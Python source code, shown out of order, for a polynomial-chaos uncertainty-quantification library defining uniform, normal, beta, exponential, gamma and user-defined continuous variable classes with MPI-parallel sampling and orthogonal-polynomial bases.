Overrides the Variable class check_distribution to align with
a normal distribution.
"""
comm = MPI_COMM_WORLD
rank = comm.rank
if rank == 0 and (np.max(self.std_vals) > 4.5) or (np.min(self.std_vals) < -4.5):
warn(
f'Large standardized value for variable {self.name} '
'with normal distribution found. Check input and run matrix.'
)
return -1
def generate_samples(self, samp_size):
"""
Inputs: samp_size- the number of points needed to be generated
Overrides the Variable class generate_samples to align with
a normal distribution.
"""
low_percent = 8e-17
high_percent = 1 - low_percent
dist = norm(loc=self.mean, scale=self.stdev)
rnd_hypercube = uniform_hypercube(low_percent, high_percent, samp_size)
vals = dist.ppf(rnd_hypercube)
return vals
def get_norm_sq_val(self, matrix_value):
"""
Inputs: matrix_val- the value in the model matrix to consider
Overrides the Variable class get_norm_sq_val to align with
a normal distribution.
"""
return math.factorial(matrix_value)
def get_resamp_vals(self, samp_size):
"""
Inputs: samp_size- the number of samples to generate according to the
distribution
Overrides the Variable class get_resamp_vals to align with
a normal distribution.
"""
comm = MPI_COMM_WORLD
size = comm.size
rank = comm.rank
base = samp_size // size
rem = samp_size % size
count = base + (rank < rem)
ranks = np.arange(0, size, dtype=int)
seq_count = (ranks < rem) + base
seq_disp = base * ranks + (ranks >= rem) * rem + (ranks < rem) * ranks
self.resample = np.zeros(samp_size)
resample = np.random.randn(count)
comm.Allgatherv(
[resample, count, MPI_DOUBLE],
[self.resample, seq_count, seq_disp, MPI_DOUBLE]
)
return self.resample
def check_num_string(self):
"""
Searches to replace sring 'pi' with its numpy equivalent in any of the
values that might contain it.
"""
if isinstance(self.mean, str) and 'pi' in self.mean:
self.mean = float(self.mean.replace('pi', str(np.pi)))
if isinstance(self.stdev, str) and 'pi' in self.stdev:
self.stdev = float(self.stdev.replace('pi', str(np.pi)))
def get_mean(self):
"""
Return the mean of the variable.
"""
return self.mean
class BetaVariable(ContinuousVariable):
"""
Inputs: alpha- the alpha parameter of the variable
beta- the beta parameter of the variable
interval_low- the low interval of the variable
interval_high- the high interval of the variable
order- the order of the model to calculate the orthogonal
polynomials and norm squared values
type- the type of variable
name- the name of the variable
number- the number of the variable from the file
Represents a beta variable. The methods in this class correspond to
those of a beta variable.
"""
__slots__ = ('alpha', 'beta')
equation = '((A+B-1)! * (x)**(A-1) * (1-x)**(B-1)) / ((A-1)! * (B-1)!)'
def generate_orthopoly(self):
"""
Generates the orthogonal polynomials for a beta variable up to the
self.self.order of polynomial expansion.
"""
var_orthopoly_vect = np.zeros(self.order + 1, dtype=object)
self.var_orthopoly_vect = np.zeros(self.order + 1, dtype=object)
x = self.x
a = parse_expr(str(Fraction(self.alpha)))
b = parse_expr(str(Fraction(self.beta)))
decimals = 30
for n in range(self.order + 1):
if n == 0:
var_orthopoly_vect[n] = 1
self.var_orthopoly_vect[n] = 1
elif n == 1:
var_orthopoly_vect[n] = x - (a / (a + b))
self.var_orthopoly_vect[n] = x - (a / (a + b))
else:
var_orthopoly_vect[n] = x ** n
pasc = pascal(self.order + 1, kind='lower')
for m in range(n):
var_orthopoly_vect[n] -= parse_expr(
f'{pasc[n, m]} * ((a+n-1)!*(a+b+2*m-1)!)/((a+m-1)!*(a+b+n+m-1)!)*({var_orthopoly_vect[m]})',
local_dict={'a':a, 'b':b, 'n':n, 'm':m, 'x':x}
)
self.var_orthopoly_vect[n] = N(var_orthopoly_vect[n], decimals)
return self.var_orthopoly_vect
def standardize(self, orig, std_vals):
"""
Inputs: orig- the un-standardized values
std_vals- the attribue name for the standardized vals
Overrides the Variable class standardize to align with
a beta distribution.
"""
original = getattr(self, orig)
standard = (
(original[:] - self.interval_low)
/ (self.interval_high - self.interval_low)
)
setattr(self, std_vals, standard)
return getattr(self, std_vals)
def standardize_points(self, values):
"""
Inputs: values- unstandardized points corresponding to the variable's
distribution
Standardizes and returns the inputs points.
"""
standard = (
(values - self.interval_low)
/ (self.interval_high - self.interval_low)
)
return standard
def unstandardize_points(self, value):
"""
Inputs: value- the standardized value to be unstandardized
Calculates and returns the unscaled variable value from the
standardized value.
"""
unscaled_value = value = (
value * (self.interval_high - self.interval_low)
+self.interval_low
)
return unscaled_value
def check_distribution(self):
"""
Overrides the Variable class check_distribution to align with
an beta distribution.
"""
shift = 8
comm = MPI_COMM_WORLD
rank = comm.rank
if rank == 0 and (np.max(self.std_vals) > shift) or (np.min(self.std_vals) < -shift):
warn(
f'Large standardized value for variable {self.name} '
'with Beta distribution found. Check input and run matrix.'
)
return -1
def generate_samples(self, samp_size):
"""
Inputs: samp_size- the number of points needed to be generated
Overrides the Variable class generate_samples to align with
an beta distribution.
"""
low_percent = 0
high_percent = 1
dist = beta(a=self.alpha, b=self.beta)
rnd_hypercube = uniform_hypercube(low_percent, high_percent, samp_size)
vals = (
(dist.ppf(rnd_hypercube) * (self.interval_high - self.interval_low))
+self.interval_low
)
return vals
def get_resamp_vals(self, samp_size):
"""
Inputs: samp_size- the number of samples to generate according to the
distribution
Overrides the Variable class get_resamp_vals to align with
an beta distribution.
"""
comm = MPI_COMM_WORLD
size = comm.size
rank = comm.rank
base = samp_size // size
rem = samp_size % size
count = base + (rank < rem)
ranks = np.arange(0, size, dtype=int)
seq_count = (ranks < rem) + base
seq_disp = base * ranks + (ranks >= rem) * rem + (ranks < rem) * ranks
self.resample = np.zeros(samp_size)
resample = np.random.beta(a=self.alpha, b=self.beta, size=count)
comm.Allgatherv(
[resample, count, MPI_DOUBLE],
[self.resample, seq_count, seq_disp, MPI_DOUBLE]
)
# The bound is included to help with ProbabilityBox convergence.
self.resample[0] = 0
self.resample[1] = 1
return self.resample
def check_num_string(self):
"""
Searches to replace sring 'pi' with its numpy equivalent in any of the
values that might contain it.
"""
if isinstance(self.alpha, str) and 'pi' in self.alpha:
self.alpha = float(self.alpha.replace('pi', str(np.pi)))
if isinstance(self.beta, str) and 'pi' in self.beta:
self.beta = float(self.beta.replace('pi', str(np.pi)))
if isinstance(self.interval_low, str) and 'pi' in self.interval_low:
self.interval_low = float(self.interval_low.replace('pi', str(np.pi)))
if isinstance(self.interval_high, str) and 'pi' in self.interval_high:
self.interval_high = float(self.interval_high.replace('pi', str(np.pi)))
def get_mean(self):
"""
Return the mean of the variable.
"""
scale = self.interval_high - self.interval_low
mean = (
self.interval_low + scale * (self.alpha / (self.alpha + self.beta))
)
return mean
class ExponentialVariable(ContinuousVariable):
"""
Inputs: lambd- the lambda parameter of the variable values
interval_low- the low interval of the variable
order- the order of the model to calculate the orthogonal
polynomials and norm squared values
type- the type of variable
name- the name of the variable
number- the number of the variable from the file
Represents an exponential variable. The methods in this class correspond to
those of an exponential variable.
"""
__slots__ = ('lambda')
equation = 'lambd * exp(-lambd * x)'
def standardize(self, orig, std_vals):
"""
Inputs: orig- the un-standardized values
std_vals- the attribue name for the standardized vals
Overrides the Variable class standardize to align with an exponential distribution.
"""
original = getattr(self, orig)
standard = (original[:] - self.interval_low)
setattr(self, std_vals, standard)
return getattr(self, std_vals)
def standardize_points(self, values):
"""
Inputs: values- unstandardized points corresponding to the variable's
distribution
Standardizes and returns the inputs points.
"""
return values - self.interval_low
def unstandardize_points(self, value):
"""
Inputs: value- the standardized value to be unstandardized
Calculates and returns the unscaled variable value from the
standardized value.
"""
return value + self.interval_low
def check_distribution(self):
"""
Overrides the Variable class check_distribution to align with
an exponential distribution.
"""
shift = 15
comm = MPI_COMM_WORLD
rank = comm.rank
if rank == 0 and ((np.min(self.std_vals) < 0)
or (np.max(self.std_vals) > shift)
):
warn(
f'Large standardized value for variable {self.name} '
'with exponential distribution found. Check input and run '
'matrix.'
)
return -1
def generate_samples(self, samp_size):
"""
Inputs: samp_size- the number of samples to generate according to the
distribution
Overrides the Variable class generate_samples to align with
an exponential distribution.
"""
percent_shift = 8e-17
low_percent = 0
high_percent = 1 - percent_shift
dist = expon(scale=1 / getattr(self, 'lambda'))
rnd_hypercube = uniform_hypercube(low_percent, high_percent, samp_size)
vals = dist.ppf(rnd_hypercube) + self.interval_low
np.random.shuffle(vals)
return vals
def get_resamp_vals(self, samp_size):
"""
Inputs: samp_size- the number of samples to generate according to the
distribution
Overrides the Variable class get_resamp_vals to align with
an exponential distribution.
"""
comm = MPI_COMM_WORLD
size = comm.size
rank = comm.rank
base = samp_size // size
rem = samp_size % size
count = base + (rank < rem)
ranks = np.arange(0, size, dtype=int)
seq_count = (ranks < rem) + base
seq_disp = base * ranks + (ranks >= rem) * rem + (ranks < rem) * ranks
self.resample = np.zeros(samp_size)
resample = np.random.exponential(
scale=(1 / getattr(self, 'lambda')), size=count
)
comm.Allgatherv(
[resample, count, MPI_DOUBLE],
[self.resample, seq_count, seq_disp, MPI_DOUBLE]
)
# The bound is included to help with ProbabilityBox convergence.
self.resample[0] = 0
return self.resample
def check_num_string(self):
"""
Searches to replace sring 'pi' with its numpy equivalent in any of the
values that might contain it.
"""
lambd = getattr(self, 'lambda')
if isinstance(lambd, str) and 'pi' in lambd:
setattr(self, 'lambda', float(lambd.replace('pi', str(np.pi))))
def get_mean(self):
"""
Return the mean of the variable.
"""
return self.interval_low + (1 / getattr(self, 'lambda'))
class GammaVariable(ContinuousVariable):
"""
Inputs: alpha- the alpha parameter of the variable
theta- the theta parameter of the variable
interval_low- the low interval of the variable
order- the order of the model to calculate the orthogonal
polynomials and norm squared values
type- the type of variable
name- the name of the variable
number- the number of the variable from the file
Represents a gamma variable. The methods in this class correspond to
those of a gamma variable.
"""
__slots__ = ('alpha', 'theta')
# This is the standardized form required for the UQPCE variable basis and
# norm squared.
equation = '(x**(A-1) * exp(-x)) / (A-1)!'
def standardize(self, orig, std_vals):
"""
Inputs: orig- the un-standardized values
std_vals- the attribue name for the standardized vals
Overrides the Variable class standardize to align with
a gamma distribution.
"""
standard = (getattr(self, orig) - self.interval_low) / self.theta
setattr(self, std_vals, standard)
return getattr(self, std_vals)
def standardize_points(self, values):
"""
Inputs: values- unstandardized points corresponding to the variable's
distribution
Standardizes and returns the inputs points.
"""
return (values - self.interval_low) / self.theta
def unstandardize_points(self, value):
"""
Inputs: value- the standardized value to be unstandardized
Calculates and returns the unscaled variable value from the
standardized value.
"""
return (value * self.theta) + self.interval_low
def check_distribution(self):
"""
Overrides the Variable class check_distribution to align with
a gamma distribution.
"""
shift = 15
comm = MPI_COMM_WORLD
rank = comm.rank
if rank == 0 and ((np.max(self.std_vals) > shift)
or (np.min(self.std_vals) < 0)
):
warn(
f'Large standardized value for variable {self.name} '
'with gamma distribution found. Check input and run matrix.'
)
return -1
def generate_samples(self, samp_size):
"""
Inputs: samp_size- the number of points needed to be generated
Overrides the Variable class generate_samples to align with
a gamma distribution.
"""
percent_shift = 8e-17
low_percent = 0
high_percent = 1 - percent_shift
dist = gamma(self.alpha, scale=self.theta)
rnd_hypercube = uniform_hypercube(low_percent, high_percent, samp_size)
vals = dist.ppf(rnd_hypercube) + self.interval_low
return vals
def get_resamp_vals(self, samp_size):
"""
Inputs: samp_size- the number of samples to generate according to the
distribution
Overrides the Variable class get_resamp_vals to align with
a gamma distribution.
"""
comm = MPI_COMM_WORLD
size = comm.size
rank = comm.rank
base = samp_size // size
rem = samp_size % size
count = base + (rank < rem)
ranks = np.arange(0, size, dtype=int)
seq_count = (ranks < rem) + base
seq_disp = base * ranks + (ranks >= rem) * rem + (ranks < rem) * ranks
self.resample = np.zeros(samp_size)
resample = np.random.gamma(shape=self.alpha, scale=1, size=count)
comm.Allgatherv(
[resample, count, MPI_DOUBLE],
[self.resample, seq_count, seq_disp, MPI_DOUBLE]
)
# The bound is included to help with ProbabilityBox convergence.
self.resample[0] = 0
return self.resample
def check_num_string(self):
"""
Searches to replace sring 'pi' with its numpy equivalent in any of the
values that might contain it.
"""
if isinstance(self.alpha, str) and 'pi' in self.alpha:
self.alpha = float(self.alpha.replace('pi', str(np.pi)))
if isinstance(self.theta, str) and 'pi' in self.theta:
self.theta = float(self.theta.replace('pi', str(np.pi)))
def get_mean(self):
"""
Return the mean of the variable.
"""
return self.interval_low + (self.alpha * self.theta)
| 32.194163 | 116 | 0.566064 | from builtins import setattr, getattr
from fractions import Fraction
import math
from multiprocessing import Process, Manager
from warnings import warn, showwarning
try:
from sympy import *
import numpy as np
from scipy.stats import norm, beta, gamma, expon
from scipy.linalg import pascal
from scipy.integrate import quad
from sympy import (
symbols, zeros, integrate, N, factorial, sqrt, simplify, sympify, Abs
)
from sympy.core.numbers import NaN
from sympy.integrals.integrals import Integral
from sympy.parsing.sympy_parser import parse_expr
from sympy.solvers import solve
from sympy.utilities.lambdify import lambdify
from mpi4py import MPI
from mpi4py.MPI import (
COMM_WORLD as MPI_COMM_WORLD, DOUBLE as MPI_DOUBLE, MAX as MPI_MAX
)
except:
warn('Ensure that all required packages are installed.')
exit()
from PCE_Codes.custom_enums import Distribution, UncertaintyType
from PCE_Codes._helpers import _warn, uniform_hypercube
from PCE_Codes.variables.variable import Variable
from PCE_Codes.error import VariableInputError
class ContinuousVariable(Variable):
"""
Inputs: pdf- the equation that defines the pdf of the variable values
interval_low- the low interval of the variable
interval_high- the high interval of the variable
order- the order of the model to calculate the orthogonal
polynomials and norm squared values
type- the type of variable
name- the name of the variable
number- the number of the variable from the file
Class represents a continuous variable.
"""
def __init__(
self, pdf, interval_low, interval_high, order=2,
type='aleatory', name='', number=0
):
self.distribution = pdf
self.interval_low = interval_low
self.interval_high = interval_high
self.order = order
self.type = UncertaintyType.from_name(type)
self.name = f'x{number}' if name == '' else name
self.var_str = f'x{number}'
self.x = symbols(self.var_str)
self.low_approx = self.interval_low
self.high_approx = self.interval_high
self.bounds = (self.interval_low, self.interval_high)
self.std_bounds = (self.interval_low, self.interval_high)
# split at white space and rejoin to remove all whitespace- make safer
self.distribution = ''.join(self.distribution.split())
self.distribution = (
parse_expr(self.distribution, local_dict={'x':self.x})
)
self.check_num_string()
self.get_probability_density_func() # make sure sum over interval = 1
self.recursive_var_basis(
self.distribution, self.interval_low, self.interval_high, self.order
)
self.create_norm_sq(
self.interval_low, self.interval_high, self.distribution
)
if self.type == UncertaintyType.EPISTEMIC:
warn(
'The ContinuousVariable is usually not epistemic. For an epistemic '
'variable, consider using the uniform distribution with type '
'epistemic.'
)
showwarning = _warn
def get_probability_density_func(self):
"""
Turns the input function into the corresponding probability density
function.
"""
diff_tol = 1e-5
tol = 1e-12
f = lambdify(self.x, self.distribution, ('numpy', 'sympy'))
const = quad(f, self.low_approx, self.high_approx, epsabs=tol, epsrel=tol)[0]
const_rnd = np.round(const)
if np.abs(const_rnd - const) < diff_tol:
const = const_rnd
self.distribution = self.distribution / const
def standardize(self, orig, std_vals):
"""
Inputs: orig- the un-standardized values
std_vals- the attribue name for the standardized vals
For each variable, it adds a new attribute for the standardized values
from the original input values.
"""
setattr(self, std_vals, getattr(self, orig))
return getattr(self, std_vals)
def standardize_points(self, values):
"""
Inputs: values- unstandardized points corresponding to the variable's
distribution
Standardizes and returns the inputs points.
"""
return values # general variable must already be standardized
def unstandardize_points(self, value):
"""
Inputs: value- the standardized value to be unstandardized
Calculates and returns the unscaled variable value from the
standardized value.
"""
return value # general variable must already be standardized
def check_distribution(self):
"""
Checks all values in an array to ensure that they are standardized.
"""
comm = MPI_COMM_WORLD
rank = comm.rank
mx = np.max(self.std_vals)
mn = np.min(self.std_vals)
if rank == 0 and mx > self.high_approx or mn < self.low_approx:
warn(
f'Large standardized value for variable {self.name} '
'with user distribution found. Check input and run matrix.'
)
return -1
def generate_samples(self, samp_size):
"""
Inputs: samp_size- the number of points needed to be generated
Generates points according to the Latin hypercube; each point is in an
interval of equal probability.
"""
decimals = 30
comm = MPI_COMM_WORLD
size = comm.size
rank = comm.rank
is_manager = (rank == 0)
base = samp_size // size
rem = samp_size % size
count = base + (rank < rem)
ranks = np.arange(0, size, dtype=int)
seq_count = (ranks < rem) + base
seq_disp = base * ranks + (ranks >= rem) * rem + (ranks < rem) * ranks
self.inverse_func = None
self.failed = None
try:
y = symbols('y')
if self.failed != None:
raise AttributeError # skip if has already gone through and failed
# solve for the cumulative density function with 10s timeout
if is_manager and not hasattr(self, 'cum_dens_func'):
manager = Manager()
proc_dict = manager.dict()
cdf_proc = Process(target=self._calc_cdf, args=(proc_dict,))
cdf_proc.start()
cdf_proc.join(10.0)
if cdf_proc.is_alive():
cdf_proc.terminate()
try:
self.cum_dens_func = proc_dict['cum_dens_func']
# solve for the inverse function with 10s timeout
inv_proc = Process(target=self._invert, args=(proc_dict,))
inv_proc.start()
inv_proc.join(10.0)
if inv_proc.is_alive():
inv_proc.terminate()
self.inverse_func = proc_dict['inverse_func']
except KeyError:
self.failed = 1
self.failed = comm.bcast(self.failed, root=0)
if not self.failed:
self.inverse_func = comm.bcast(self.inverse_func, root=0)
else:
raise ValueError
# plug in random uniform 0 -> 1 to solve for x vals
all_samples = np.zeros(samp_size)
for i in range(len(self.inverse_func)): # multiple solutions
inv_func = (
np.vectorize(
lambdify(y, str(self.inverse_func[i]), ('numpy', 'sympy'))
)
)
samples = N(inv_func(uniform_hypercube(0, 1, count)), decimals)
comm.Allgatherv(
[samples, count, MPI_DOUBLE],
[all_samples, seq_count, seq_disp, MPI_DOUBLE]
)
if np.min(all_samples) >= self.low_approx and np.max(all_samples) <= self.high_approx:
np.random.shuffle(all_samples)
return all_samples
if not (
(np.min(samples) >= self.low_approx) and (np.max(samples) <= self.high_approx)
):
raise ValueError
# if cdf or inverse func can't be found, use rejection-acceptance sampling
except (ValueError, NameError, AttributeError):
func = lambdify(self.x, self.distribution, ('numpy', 'sympy'))
try_total = 5000
tries = try_total // size + (rank < try_total % size)
max_all = np.zeros(1)
try:
max_val = (
np.max(func(
np.random.uniform(
self.low_approx, self.high_approx, tries
)
))
)
except RuntimeError:
max_val = np.max(
func(
np.random.uniform(
self.low_approx, self.high_approx, tries
)
)
).astype(float)
comm.Allreduce(
[max_val, MPI_DOUBLE], [max_all, MPI_DOUBLE], op=MPI_MAX
)
samples = np.zeros(count)
all_samples = np.zeros(samp_size)
i = 0
j = 0
y_vals = np.random.uniform(0, max_all, count)
x_vals = np.random.uniform(self.low_approx, self.high_approx, count)
func_vals = func(x_vals)
# while loop until all 'samp_size' samples have been generated
while i < count:
if j == count:
y_vals = np.random.uniform(0, max_all, count)
x_vals = np.random.uniform(self.low_approx, self.high_approx, count)
func_vals = func(x_vals)
j = 0
if y_vals[j] <= func_vals[j]:
samples[i] = x_vals[j]
i += 1
j += 1
comm.Allgatherv(
[samples, count, MPI_DOUBLE],
[all_samples, seq_count, seq_disp, MPI_DOUBLE]
)
np.random.shuffle(all_samples)
return all_samples
def create_norm_sq(self, low, high, func):
"""
Inputs: low- the low interval bound for the distribution
high- the high interval bound for the distribution
func- the function corresponding to the distribution
Calculates the norm squared values up to the order of polynomial
expansion based on the probability density function and its
corresponding orthogonal polynomials.
"""
orthopoly_count = len(self.var_orthopoly_vect)
self.norm_sq_vals = np.zeros(orthopoly_count)
tries = 2
zero = 0
# is rounded off at 50 decimals, requiring two decimals places
norm_sq_thresh = 1e-49
for i in range(orthopoly_count):
proc_dict = {}
for j in range(tries):
self._norm_sq(low, high, func, i, j, proc_dict)
try:
if (proc_dict['out'] is not None) and (not math.isclose(proc_dict['out'], zero)):
self.norm_sq_vals[i] = proc_dict['out']
break # only breaks inner loop
except KeyError:
pass
if (self.norm_sq_vals == zero).any():
warn(f'Finding the norm squared for variable {self.name} failed.')
if (self.norm_sq_vals <= norm_sq_thresh).any():
warn(
f'At least one norm squared value for variable {self.name} is '
f'very small. This can introduce error into the model.'
)
def _norm_sq(self, low, high, func, i, region, proc_dict):
"""
Inputs: low- the low interval bound for the distribution
high- the high interval bound for the distribution
func- the function corresponding to the distribution
i- the index of the norm squared to calculate
region- which sympy calculation to try for the norm squared
proc_dict- the dictionary in which the output will be stored
An assistant to create_norm_sq; allows the norm squared calculations to
have a timeout if an error isn't raised and the solution isn't found
reasonably quickly.
"""
proc_dict['out'] = None
# round 0.99999999 to 1 to reduce error; if value is small, don't round
thresh = 1e-2
tol = 1e-12
diff_tol = 1e-8
decimals = 30
if high == 'oo':
ul = np.inf
elif high == 'pi':
ul = np.pi
elif high == '-pi':
ul = -np.pi
else:
ul = high
if low == '-oo':
ll = -np.inf
elif low == 'pi':
ll = np.pi
elif low == '-pi':
ll = -np.pi
else:
ll = low
if region == 0:
try:
f = lambdify(self.x, func * self.var_orthopoly_vect[i] ** 2, ('numpy', 'sympy'))
ans = quad(f, ll, ul, epsabs=tol, epsrel=tol)[0]
if np.abs(int(ans) - ans) < diff_tol:
proc_dict['out'] = int(ans)
elif ans > thresh:
proc_dict['out'] = round(ans, 7)
else:
proc_dict['out'] = ans
except:
pass
elif region == 1:
try:
f = lambdify(
self.x,
N(func * self.var_orthopoly_vect[i] ** 2, decimals),
('numpy', 'sympy')
)
ans = quad(f, ll, ul, epsabs=tol, epsrel=tol)[0]
if np.abs(int(ans) - ans) < diff_tol:
proc_dict['out'] = int(ans)
elif ans > thresh:
proc_dict['out'] = round(ans, 7)
else:
proc_dict['out'] = ans
except:
pass
elif region == 2:
try:
f = lambdify(
self.x,
sympify(f'{func} * ({self.var_orthopoly_vect[i]}) ** 2'),
('numpy', 'sympy')
)
ans = quad(f, ll, ul, epsabs=tol, epsrel=tol)[0]
if np.abs(int(ans) - ans) < diff_tol:
proc_dict['out'] = int(ans)
elif ans > thresh:
proc_dict['out'] = round(ans, 7)
else:
proc_dict['out'] = ans
except:
pass
def recursive_var_basis(self, func, low, high, order):
"""
Inputs: func- the probability density function of the input equation
low- the low bound on the variable
high- the high bound on the variable
order- the order of polynomial expansion
Recursively calculates the variable basis up to the input 'order'.
"""
tol = 1e-12
if low == '-oo':
low = -np.inf
if high == 'oo':
high = np.inf
if order == 0:
self.poly_denom = np.zeros(self.order, dtype=object)
self.var_orthopoly_vect = np.zeros(self.order + 1, dtype=object)
self.var_orthopoly_vect[order] = 1
return
else:
self.recursive_var_basis(func, low, high, order - 1)
curr = self.x ** order
for i in range(order):
orthopoly = self.var_orthopoly_vect[i]
if self.poly_denom[i] == 0:
f = lambdify(self.x, orthopoly ** 2 * func, ('numpy', 'sympy'))
self.poly_denom[i] = quad(f, low, high, epsabs=tol, epsrel=tol)[0]
f = lambdify(self.x, self.x ** order * orthopoly * func, ('numpy', 'sympy'))
intergal_eval = (
quad(f, low, high, epsabs=tol, epsrel=tol)[0]
/ self.poly_denom[i]
) * orthopoly
curr -= intergal_eval
self.var_orthopoly_vect[order] = curr
if order == self.order and (self.var_orthopoly_vect == 0).any():
warn(
f'Variable {self.name} has at least one orthogonal polynomial '
f'that is zero. The model may not be accurate'
)
return
def get_resamp_vals(self, samp_size):
"""
Inputs: samp_size- the number of samples to generate according to the
distribution
Generates samp_size number of samples according to the pdf of the
Variable.
"""
self.resample = self.generate_samples(samp_size)
return self.resample
def _calc_cdf(self, proc_dict):
"""
Inputs: proc_dict- the dictionary in which the output will be stored
Calculates the cumulative density function of the distribution.
"""
try:
proc_dict['cum_dens_func'] = integrate(
self.distribution, (self.x, self.interval_low, self.x)
)
except RuntimeError:
pass
def _invert(self, proc_dict):
"""
Inputs: proc_dict- the dictionary in which the output will be stored
Solves for the inverse function of the cumulative density function.
"""
y = symbols('y')
try:
proc_dict['inverse_func'] = solve(f'{self.cum_dens_func}-y', self.x)
except (NameError, NotImplementedError, AttributeError, RuntimeError):
pass
def check_num_string(self):
"""
Checks for values in the input file that correspond to pi, -oo, or oo.
If these values exist, they are converted into values that Python can
use to create resampling points.
"""
decimals = 30
if self.interval_low == '-oo' or self.interval_high == 'oo':
x = self.x
integrate_tuple = (x, self.interval_low, self.interval_high)
self.mean = integrate(x * self.distribution, integrate_tuple)
stdev = (
math.sqrt(
integrate(x ** 2 * self.distribution, integrate_tuple)
-self.mean ** 2
)
)
if isinstance(self.interval_low, str):
if 'pi' in self.interval_low:
temp_low = float(self.interval_low.replace('pi', str(np.pi)))
self.interval_low = temp_low
self.low_approx = temp_low
elif self.interval_low == '-oo':
self.low_approx = N(self.mean - 10 * stdev, decimals)
if isinstance(self.interval_high, str):
if 'pi' in self.interval_high:
temp_high = float(self.interval_high.replace('pi', str(np.pi)))
self.interval_high = temp_high
self.high_approx = temp_high
elif self.interval_high == 'oo':
self.high_approx = N(self.mean + 10 * stdev, decimals)
def get_mean(self):
"""
Return the mean of the variable.
"""
decimals = 30
if not hasattr(self, 'mean'):
x = self.x
integrate_tuple = (x, self.interval_low, self.interval_high)
self.mean = integrate(x * self.distribution, integrate_tuple)
return N(self.mean, decimals)
class UniformVariable(ContinuousVariable):
"""
Inputs: interval_low- the low interval of the variable
interval_high- the high interval of the variable
order- the order of the model to calculate the orthogonal
polynomials and norm squared values
type- the type of variable
name- the name of the variable
number- the number of the variable from the file
Represents a uniform variable. The methods in this class correspond to
those of a uniform variable.
"""
def __init__(
self, interval_low, interval_high, order=2, type='aleatory',
name='', number=0
):
if not interval_low < interval_high:
raise VariableInputError(
'UniformVariable interval_high must be greater than '
'interval_low.'
)
self.interval_low = interval_low
self.interval_high = interval_high
self.order = order
self.type = UncertaintyType.from_name(type)
self.name = f'x{number}' if name == '' else name
self.var_str = f'x{number}'
self.x = symbols(self.var_str)
self.distribution = Distribution.UNIFORM
self.generate_orthopoly()
self.low_approx = self.interval_low
self.high_approx = self.interval_high
self.bounds = (self.interval_low, self.interval_high)
self.std_bounds = (-1, 1)
self.check_num_string()
showwarning = _warn
def generate_orthopoly(self):
"""
Generates the orthogonal polynomials for a uniform variable up to the
order of polynomial expansion.
"""
self.var_orthopoly_vect = np.zeros(self.order + 1, dtype=object)
x = self.x
for n in range(self.order + 1):
if n == 0:
self.var_orthopoly_vect[n] = 1
elif n == 1:
self.var_orthopoly_vect[n] = x
else:
self.var_orthopoly_vect[n] = (
(
(2 * n - 1) * x
* self.var_orthopoly_vect[n - 1] - (n - 1)
* self.var_orthopoly_vect[n - 2]
)
/ n
)
def standardize(self, orig, std_vals):
"""
Inputs: orig- the un-standardized values
std_vals- the attribue name for the standardized vals
Overrides the Variable class standardize to align with
a uniform distribution.
"""
original = getattr(self, orig)
mean = (
(self.interval_high - self.interval_low) / 2 + self.interval_low
)
stdev = (self.interval_high - self.interval_low) / 2
standard = (original[:] - mean) / stdev
setattr(self, std_vals, standard)
return getattr(self, std_vals)
def standardize_points(self, values):
"""
Inputs: values- unstandardized points corresponding to the variable's
distribution
Standardizes and returns the inputs points.
"""
mean = (
(self.interval_high - self.interval_low) / 2 + self.interval_low
)
stdev = (self.interval_high - self.interval_low) / 2
return (values - mean) / stdev
def unstandardize_points(self, value):
"""
Inputs: value- the standardized value to be unstandardized
Calculates and returns the unscaled variable value from the
standardized value.
"""
mean = (
(self.interval_high - self.interval_low) / 2 + self.interval_low
)
stdev = (self.interval_high - self.interval_low) / 2
return (value * stdev) + mean
def check_distribution(self):
"""
Overrides the Variable class check_distribution to align with
a uniform distribution.
"""
if (
(np.max(self.std_vals) > 1 + 1e-5)
or (np.min(self.std_vals) < -1 - 1e-5)
):
warn(
f'Standardized value for variable {self.name} with uniform '
'distribution outside expected [-1, 1] bounds'
)
return -1
def generate_samples(self, samp_size):
"""
Inputs: samp_size- the number of points needed to be generated
Overrides the Variable class generate_samples to align with
a uniform distribution.
"""
vals = (
uniform_hypercube(self.interval_low, self.interval_high, samp_size)
)
return vals
def get_norm_sq_val(self, matrix_val):
"""
Inputs: matrix_val- the value in the model matrix to consider
Overrides the Variable class get_norm_sq_val to align with
a uniform distribution.
"""
return 1.0 / (2.0 * matrix_val + 1.0)
def get_resamp_vals(self, samp_size):
"""
Inputs: samp_size- the number of samples to generate according to the
distribution
Overrides the Variable class get_resamp_vals to align with
a uniform distribution.
"""
comm = MPI_COMM_WORLD
size = comm.size
rank = comm.rank
base = samp_size // size
rem = samp_size % size
count = base + (rank < rem)
ranks = np.arange(0, size, dtype=int)
seq_count = (ranks < rem) + base
seq_disp = base * ranks + (ranks >= rem) * rem + (ranks < rem) * ranks
self.resample = np.zeros(samp_size)
resample = np.random.uniform(-1, 1, count)
comm.Allgatherv(
[resample, count, MPI_DOUBLE],
[self.resample, seq_count, seq_disp, MPI_DOUBLE]
)
# The bound is included to help with ProbabilityBox convergence.
self.resample[0] = -1
self.resample[1] = 1
return self.resample
def check_num_string(self):
"""
Searches to replace sring 'pi' with its numpy equivalent in any of the
values that might contain it.
"""
if isinstance(self.interval_low, str) and 'pi' in self.interval_low:
self.interval_low = float(self.interval_low.replace('pi', str(np.pi)))
if isinstance(self.interval_high, str) and 'pi' in self.interval_high:
self.interval_high = float(self.interval_high.replace('pi', str(np.pi)))
def get_mean(self):
"""
Return the mean of the variable.
"""
return (self.interval_high - self.interval_low) / 2 + self.interval_low
class NormalVariable(ContinuousVariable):
"""
Inputs: mean- the mean of the variable
stdev- the standard deviation of the variable
order- the order of the model to calculate the orthogonal
polynomials and norm squared values
type- the type of variable
name- the name of the variable
number- the number of the variable from the file
Represents a normal variable. The methods in this class correspond to
those of a normal variable.
"""
__slots__ = ('mean', 'stdev')
def __init__(self, mean, stdev, order=2, type='aleatory',
name='', number=0
):
if not stdev > 0:
raise VariableInputError(
'NormalVariable stdev must be greater than 0.'
)
self.mean = mean
self.stdev = stdev
self.order = order
self.type = UncertaintyType.from_name(type)
self.name = f'x{number}' if name == '' else name
self.var_str = f'x{number}'
self.x = symbols(self.var_str)
self.distribution = Distribution.NORMAL
self.generate_orthopoly()
low_percent = 8e-17
high_percent = 1 - low_percent
dist = norm(loc=self.mean, scale=self.stdev)
self.low_approx = dist.ppf(low_percent)
self.high_approx = dist.ppf(high_percent)
self.std_bounds = (
self.standardize_points(self.low_approx),
self.standardize_points(self.high_approx)
)
self.bounds = (dist.ppf(low_percent), dist.ppf(high_percent))
self.check_num_string()
if self.type == UncertaintyType.EPISTEMIC:
warn(
